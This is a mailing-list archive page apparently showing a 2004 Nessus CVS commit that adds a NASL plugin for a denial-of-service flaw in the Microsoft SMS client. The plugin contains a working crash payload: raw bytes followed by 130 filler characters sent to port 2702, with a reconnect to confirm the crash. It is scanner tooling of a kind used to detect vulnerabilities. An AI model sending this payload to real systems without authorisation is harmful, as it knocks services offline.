nessus-plugins/scripts mssms_dos.nasl,NONE,1.1
Update of /usr/local/cvs/nessus-plugins/scripts
In directory raccoon.nessus.org:/tmp/cvs-serv60956
Added Files:
mssms_dos.nasl
Log Message:
added
--- NEW FILE: mssms_dos.nasl ---
#
# Noam Rathaus
#
# Subject: Denial of Service (DoS) in Microsoft SMS Client
# From: vuln_at_hexview.com
# Date: 14.7.2004 21:45
if(description)
{
script_id(13752);
name["english"] = "Denial of Service (DoS) in Microsoft SMS Client";
script_name(english:name["english"]);
desc["english"] = "
Microsoft Systems Management Server provides configuration management
solution for Windows platform. It is widely deployed in medium and large
network environments. A flaw in SMS Remote Control service makes possible to
crash the service remotely leading to the DoS condition.
Affected products:
All tests were performed on a client part of Microsoft Systems Management
Server version 2.50.2726.0.
Risk factor : Medium";
script_description(english:desc["english"]);
summary["english"] = "Detect the vulnerability of SMS Client";
script_summary(english:summary["english"]);
script_category(ACT_DESTRUCTIVE_ATTACK);
script_copyright(english:"This script is Copyright (C) 2004 Noam Rathaus");
family["english"] = "Denial of Service";
script_family(english:family["english"]);
script_require_ports(2702);
exit(0);
}
debug = 0;
port = 2702;
if(get_port_state(port))
{
soc = open_sock_tcp(port);
if(soc)
{
req = raw_string(0x52, 0x43, 0x48, 0x30, 0x16, 0x00, 0x40, 0x00, 0x52, 0x43, 0x48, 0x45);
req = string(req, crap(data:raw_string(0x58), length:130));
if (debug)
{
display("req: ", req, "\n");
}
send(socket:soc, data:req);
sleep(1);
close(soc);
soc = open_sock_tcp(port);
if (!soc)
{
security_hole(port:port);
}
}
}
- Previous by Date: nessus-plugins/scripts eDonkey_detect.nasl,1.11,1.12
- Next by Date: nessus-plugins/scripts suse_SA_2002_031.nasl, NONE, 1.1 suse_SA_2002_032.nasl, NONE, 1.1 suse_SA_2002_034.nasl, NONE, 1.1 suse_SA_2002_035.nasl, NONE, 1.1 suse_SA_2002_036.nasl, NONE, 1.1 suse_SA_2002_037.nasl, NONE, 1.1 suse_SA_2002_038.nasl, NONE, 1.1 suse_SA_2002_039.nasl, NONE, 1.1 suse_SA_2002_040.nasl, NONE, 1.1 suse_SA_2002_041.nasl, NONE, 1.1 suse_SA_2002_042.nasl, NONE, 1.1 suse_SA_2002_043.nasl, NONE, 1.1 suse_SA_2002_044.nasl, NONE, 1.1 suse_SA_2002_045.nasl, NONE, 1.1 suse_SA_2002_046.nasl, NONE, 1.1 suse_SA_2002_047.nasl, NONE, 1.1 suse_SA_2002_048.nasl, NONE, 1.1 suse_SA_2003_0004.nasl, NONE, 1.1 suse_SA_2003_0006.nasl, NONE, 1.1 suse_SA_2003_0007.nasl, NONE, 1.1 suse_SA_2003_0008.nasl, NONE, 1.1 suse_SA_2003_0009.nasl, NONE, 1.1 suse_SA_2003_001.nasl, NONE, 1.1 suse_SA_2003_0010.nasl, NONE, 1.1 suse_SA_2003_0012.nasl, NONE, 1.1 suse_SA_2003_0014.nasl, NONE, 1.1 suse_SA_2003_0015.nasl, NONE, 1.1 suse_SA_2003_002.nasl, NONE, 1.1 suse_SA_2003_003.nasl, NONE, 1.1 suse_SA_2003_005.nasl, NONE, 1.1 suse_SA_2003_011.nasl, NONE, 1.1 suse_SA_2003_013.nasl, NONE, 1.1 suse_SA_2003_014.nasl, NONE, 1.1 suse_SA_2003_016.nasl, NONE, 1.1 suse_SA_2003_017.nasl, NONE, 1.1 suse_SA_2003_018.nasl, NONE, 1.1 suse_SA_2003_019.nasl, NONE, 1.1 suse_SA_2003_020.nasl, NONE, 1.1 suse_SA_2003_021.nasl, NONE, 1.1 suse_SA_2003_022.nasl, NONE, 1.1 suse_SA_2003_023.nasl, NONE, 1.1 suse_SA_2003_024.nasl, NONE, 1.1 suse_SA_2003_025.nasl, NONE, 1.1 suse_SA_2003_027.nasl, NONE, 1.1 suse_SA_2003_028.nasl, NONE, 1.1 suse_SA_2003_029.nasl, NONE, 1.1 suse_SA_2003_030.nasl, NONE, 1.1 suse_SA_2003_031.nasl, NONE, 1.1 suse_SA_2003_032.nasl, NONE, 1.1 suse_SA_2003_033.nasl, NONE, 1.1 suse_SA_2003_035.nasl, NONE, 1.1 suse_SA_2003_036.nasl, NONE, 1.1 suse_SA_2003_037.nasl, NONE, 1.1 suse_SA_2003_038.nasl, NONE, 1.1 suse_SA_2003_039.nasl, NONE, 1.1 suse_SA_2003_040.nasl, NONE, 1.1 suse_SA_2003_041.nasl, NONE, 1.1 suse_SA_2003_042.nasl, NONE, 1.1 suse_SA_2003_043.nasl, NONE, 1.1 suse_SA_2003_044.nasl, NONE, 1.1 suse_SA_2003_045.nasl, NONE, 1.1 suse_SA_2003_046.nasl, NONE, 1.1 suse_SA_2003_047.nasl, NONE, 1.1 suse_SA_2003_048.nasl, NONE, 1.1 suse_SA_2003_049.nasl, NONE, 1.1 suse_SA_2003_050.nasl, NONE, 1.1 suse_SA_2003_051.nasl, NONE, 1.1 suse_SA_2004_001.nasl, NONE, 1.1 suse_SA_2004_002.nasl, NONE, 1.1 suse_SA_2004_004.nasl, NONE, 1.1 suse_SA_2004_005.nasl, NONE, 1.1 suse_SA_2004_006.nasl, NONE, 1.1 suse_SA_2004_007.nasl, NONE, 1.1 suse_SA_2004_008.nasl, NONE, 1.1 suse_SA_2004_009.nasl, NONE, 1.1 suse_SA_2004_010.nasl, NONE, 1.1 suse_SA_2004_012.nasl, NONE, 1.1 suse_SA_2004_013.nasl, NONE, 1.1 suse_SA_2004_015.nasl, NONE, 1.1 suse_SA_2004_016.nasl, NONE, 1.1 suse_SA_2004_017.nasl, NONE, 1.1 suse_SA_2004_018.nasl, NONE, 1.1 suse_SA_2004_019.nasl, NONE, 1.1 suse_SA_2004_020.nasl, NONE, 1.1 suse_SA_2004_021.nasl, NONE, 1.1 suse_SA_2004_022.nasl, NONE, 1.1 rpm.inc, 1.2, 1.3 ssh_get_info.nasl, 1.6, 1.7
- Previous by Thread: nessus-plugins/scripts mozilla_firefox_code_exec.nasl,NONE,1.1
- Next by Thread: nessus-plugins/scripts mycio_detect.nasl,1.7,1.8
-
Nessus-cvs July 2004 archives indexes sorted by: [ thread ]
[ subject ]
[ author ]
[ date ]
-
Nessus-cvs list archive Table of Contents
-
More information about the Nessus-cvs mailing list
This archive was generated by a fusion of
Pipermail 0.09 (Mailman edition) and
MHonArc 2.6.8.